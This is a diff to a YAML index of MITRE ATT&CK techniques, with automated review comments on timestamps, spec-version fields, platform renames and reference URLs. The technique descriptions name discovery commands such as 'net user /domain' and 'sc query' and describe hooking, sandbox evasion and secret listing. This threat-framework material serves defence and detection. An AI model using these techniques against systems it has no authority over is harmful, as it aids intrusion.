Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ created: '2020-02-11T19:01:15.930Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
+ - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+ description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+ Retrieved December 18, 2017.
+ url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+ - source_name: Microsoft Hook Overview
+ description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+ December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
+ description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
+ description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+ 12, 2017.
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
+ description: Stack Exchange - Security. (2012, July 31). What are the methods
+ to find hooked functions and APIs?. Retrieved December 12, 2017.
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1056.004
atomic_tests: []
T1552.007:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:25:28.820Z'
name: Kubernetes List Secrets
description: "Adversaries may gather credentials via APIs within a containers
environment. APIs in these environments, such as the Docker API and Kubernetes
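Review bot: dropping `x_mitre_permissions_required` (Administrator, SYSTEM) from T1056.004 in this hunk removes the only privilege information the entry carried, with no replacement field; if any consumer of the index reads that key it needs a fallback, and if this is simply what the newer upstream object ships (the version bump to '1.1' and the new `x_mitre_attack_spec_version: 3.2.0` suggest a straight re-export) the commit message should say so. The hunk also moves `x_mitre_modified_by_ref`, `type`, `id`, `created` and the whole `external_references` list to the end of the object, so most of the 94 added lines are reordering rather than content change; emitting keys in a stable order from the generator would keep future updates reviewable.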
@@ -48847,9 +49567,8 @@ credential-access:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.007
atomic_tests: []
T1556.004:
@@ -48880,7 +49599,7 @@ credential-access:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
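Review bot: the `modified` timestamp for T1556.004 moves backwards here, from '2022-05-11T14:00:00.188Z' to '2021-12-14T23:14:26.107Z'. The old value has the round '14:00:00.188Z' stamp that several other entries in this diff also carry, so the new value may well be the object's real upstream timestamp, but a regressing `modified` should be checked against the source bundle before merging: anything that compares index versions by this field will treat the entry as older than before.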
@@ -48904,8 +49623,6 @@ credential-access:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
discovery:
T1033:
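Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1556.004 but, unlike the T1056.004 entry above, adds no replacement `x_mitre_attack_spec_version`, so the object is left with no spec version at all. Confirm that is what upstream ships for this technique and not a generator path that only re-emits the field for objects it reorders.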
@@ -48970,12 +49687,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1033
atomic_tests: []
T1613:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:08:50.706Z'
name: Container and Resource Discovery
description: "Adversaries may attempt to discover containers and other resources
that are available within a containers environment. Other resources may include
@@ -49034,7 +49750,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1613
atomic_tests: []
T1016.001:
@@ -49055,7 +49770,7 @@ discovery:
- source_name: mitre-attack
external_id: T1016.001
url: https://attack.mitre.org/techniques/T1016/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-25T17:03:26.632Z'
name: 'System Network Configuration Discovery: Internet Connection Discovery'
description: |-
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert
, and GET requests to websites.
@@ -49076,13 +49791,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1016.001
atomic_tests: []
T1069:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:03:06.294Z'
name: Permission Groups Discovery
description: |-
Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
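Review bot: T1016.001 has the same gap as T1556.004: `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed and nothing is added back, while the `modified` value also regresses (from '2022-04-25' to '2021-03-25' in the preceding hunk). Worth listing every technique that ends up without `x_mitre_attack_spec_version` after this change so the pattern can be confirmed as intentional in one place.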
@@ -49105,15 +49818,14 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Group: Group Metadata'
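Review bot: the platform list for T1069 replaces 'Azure AD', 'Office 365' and 'Google Workspace' with 'Office Suite' and 'Identity Provider', alongside the version bump from '2.5' to '2.6'. Any code or per-platform index that filters techniques by the old platform strings will silently stop matching this entry, so the same change should update whatever maps platform names to index files and documentation; the same substitution is made for T1069.003 and T1087.003 further down.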
@@ -49139,13 +49851,12 @@ discovery:
url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1069.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:51:35.759Z'
name: Cloud Groups
description: |-
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -49170,12 +49881,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -49217,13 +49927,12 @@ discovery:
url: https://github.com/True-Demon/raindance
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1615:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-01-06T12:41:08.579Z'
name: Group Policy Discovery
description: |-
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -49284,12 +49993,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1615
atomic_tests: []
T1652:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:07:16.804Z'
name: Device Driver Discovery
description: |-
Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -49353,19 +50061,18 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1652
atomic_tests: []
T1087.002:
technique:
- modified: '2024-04-15T21:33:57.732Z'
+ modified: '2024-05-31T04:00:37.651Z'
name: 'Account Discovery: Domain Account'
description: "Adversaries may attempt to get a listing of domain accounts. This
information can help adversaries determine which domain accounts exist to
aid in follow-on behavior such as targeting specific accounts which possess
particular privileges.\n\nCommands such as net user /domain
and
net group /domain
of the [Net](https://attack.mitre.org/software/S0039)
- utility, dscacheutil -q group
on macOS, and ldapsearch
+ utility, dscacheutil -q group
on macOS, and ldapsearch
on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
cmdlets including Get-ADUser
and Get-ADGroupMember
may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
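Review bot: the removed and added line pair `utility, dscacheutil -q group` / `on macOS, and ldapsearch` in the T1087.002 description are identical as rendered, which usually means a whitespace-only or invisible-character difference (trailing space, non-breaking space or line ending). Confirm it is intentional; if not, normalise it so this hunk shows only the `modified` timestamp change.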
@@ -49412,7 +50119,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.002
atomic_tests: []
T1087.001:
@@ -49479,12 +50185,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.001
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -49574,18 +50279,17 @@ discovery:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
T1069.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:16:47.754Z'
name: 'Permission Groups Discovery: Domain Groups'
description: |-
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
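Review bot: the 'Deloitte Environment Awareness' reference for T1497.001 now points at the Google Drive URL with a trailing `/edit` and a retrieval date of September 13, 2024. Check that the `/edit` form still opens for an unauthenticated reader, since the bare file URL being replaced is the form used for anonymous viewing; the identical URL change is made for T1497.003 later in this diff, so both should be treated the same way.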
@@ -49628,12 +50332,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.002
atomic_tests: []
T1007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:55:18.326Z'
name: System Service Discovery
description: |-
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query
, tasklist /svc
, systemctl --type=service
, and net start
.
@@ -49674,12 +50377,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1007
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -49764,7 +50466,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1135:
@@ -49826,12 +50527,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1135
atomic_tests: []
T1120:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:41.575Z'
name: Peripheral Device Discovery
description: 'Adversaries may attempt to gather information about attached peripheral
devices and components connected to a computer system.(Citation: Peripheral
@@ -49882,12 +50582,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1120
atomic_tests: []
T1082:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:42:22.247Z'
name: System Information Discovery
description: |-
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -49898,7 +50597,6 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Maril Vernon @shewhohacks
- Praetorian
@@ -49913,7 +50611,6 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- IaaS
@@ -49961,7 +50658,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1082
atomic_tests: []
T1016.002:
@@ -50033,12 +50731,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:22:56.372Z'
name: Application Window Discovery
description: |-
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -50080,122 +50777,73 @@ discovery:
- source_name: Prevailion DarkWatchman 2021
description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
new evolution in fileless techniques. Retrieved January 10, 2022.'
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1010
atomic_tests: []
T1087.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
- type: attack-pattern
- created: '2020-02-21T21:08:33.237Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.003
- url: https://attack.mitre.org/techniques/T1087/003
- - source_name: Microsoft Exchange Address Lists
- url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
- description: Microsoft. (2020, February 7). Address lists in Exchange Server.
- Retrieved March 26, 2020.
- - source_name: Microsoft getglobaladdresslist
- url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
- description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
- 2019.
- - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
- Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
- source_name: Black Hills Attacking Exchange MailSniper, 2016
- - source_name: Google Workspace Global Access List
- url: https://support.google.com/a/answer/166870?hl=en
- description: Google. (n.d.). Retrieved March 16, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-17T20:35:35.125Z'
name: Email Account
description: |-
Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
- In on-premises Exchange and Exchange Online, theGet-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+ In on-premises Exchange and Exchange Online, the Get-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_deprecated: false
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1497.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
+ id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+ created: '2020-02-21T21:08:33.237Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1087/003
+ external_id: T1087.003
+ - source_name: Black Hills Attacking Exchange MailSniper, 2016
+ description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+ Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+ - source_name: Google Workspace Global Access List
+ description: Google. (n.d.). Retrieved March 16, 2021.
+ url: https://support.google.com/a/answer/166870?hl=en
+ - source_name: Microsoft Exchange Address Lists
+ description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+ Retrieved March 26, 2020.
+ url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+ - source_name: Microsoft getglobaladdresslist
+ description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+ 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1497.003:
+ technique:
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
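Review bot: this hunk is hard to verify because the removal of T1497.003's four contributors and six external references is interleaved with the reordering of T1087.003; they are re-added in the following hunks, so after applying the patch the two T1497.003 objects should be diffed field by field to make sure nothing was lost. Within T1087.003, `x_mitre_permissions_required: - User` is dropped with no replacement, the same gap as the earlier entries, while the platform list loses 'Office 365' and 'Google Workspace' for 'Office Suite' even though the description still discusses the Google Workspace GAL (consistent with the consolidation, but worth stating in the commit message). The 'theGet-GlobalAddressList' spacing fix and the replacement of the dead Prevailion link with a web.archive.org snapshot are both fine.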
@@ -50210,6 +50858,12 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
